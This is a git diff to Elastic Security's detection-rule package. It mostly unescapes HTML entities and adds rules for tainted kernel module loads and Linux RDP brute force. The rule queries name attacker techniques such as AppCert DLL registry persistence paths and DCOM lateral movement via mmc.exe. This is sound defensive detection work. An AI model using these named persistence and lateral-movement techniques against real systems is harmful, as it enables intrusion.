diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json index 7276c36d120..ae874a7a4bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", - "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", 
@@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json index a266f5f62c3..1a2e0c86a6b 100644 --- a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_101.json 
@@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json index c8415c5ce4d..0f8d70fc5e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json index 36dd250fae4..25ce0affaaf 100644 --- a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json +++ b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json index 1d1a4139254..74d75598728 100644 --- a/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json +++ b/packages/security_detection_engine/kibana/security_rule/51859fa0-d86b-4214-bf48-ebb30ed91305_104.json 
@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_1.json b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_1.json new file mode 100644 index 00000000000..ae9684b43c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_1.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors the syslog log file for messages related to instances of a out-of-tree kernel module load, indicating the taining of the kernel. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Out-Of-Tree Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"loading out-of-tree module taints kernel.\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "51a09737-80f7-4551-a3be-dac8ef5d181a", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": 
"MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "51a09737-80f7-4551-a3be-dac8ef5d181a_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json index 94c69f08f1b..32fa16c49cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_103.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json index edd83984994..6d78d6eaea7 100644 --- a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_104.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json index 5837c649a59..d35e838b210 100644 --- a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_105.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json index b881649dc2b..fdabef752ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -102,7 +102,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -124,7 +124,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json index e0fcbb34d32..d7638db6f6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json 
+++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Successful Linux RDP Brute Force Attack Detected", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n", "related_integrations": [ { 
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. 
The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json index 875f9bc636d..c96bdd0ca12 100644 --- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json index 61101ee8f68..c6d658ce9c0 100644 
--- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json index 6b8af30cff9..35bf532510e 100644 --- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5.json new file mode 100644 index 00000000000..2b6f01ceb78 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5.json 
@@ -0,0 +1,104 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication.",
+ "from": "now-9m",
+ "index": [
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Successful Linux RDP Brute Force Attack Detected",
+ "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n",
+ "related_integrations": [
+ {
+ "integration": "auditd",
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "auditd.data.terminal",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "related.user",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0",
+ "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1110",
+ "name": "Brute Force",
+ "reference": "https://attack.mitre.org/techniques/T1110/",
+ "subtechnique": [
+ {
+ "id": "T1110.001",
+ "name": "Password Guessing",
+ "reference": "https://attack.mitre.org/techniques/T1110/001/"
+ },
+ {
+ "id": "T1110.003",
+ "name": "Password Spraying",
+ "reference": "https://attack.mitre.org/techniques/T1110/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 5
+ },
+ "id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json
index c7e157b8750..4af991a9a40 100644
--- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
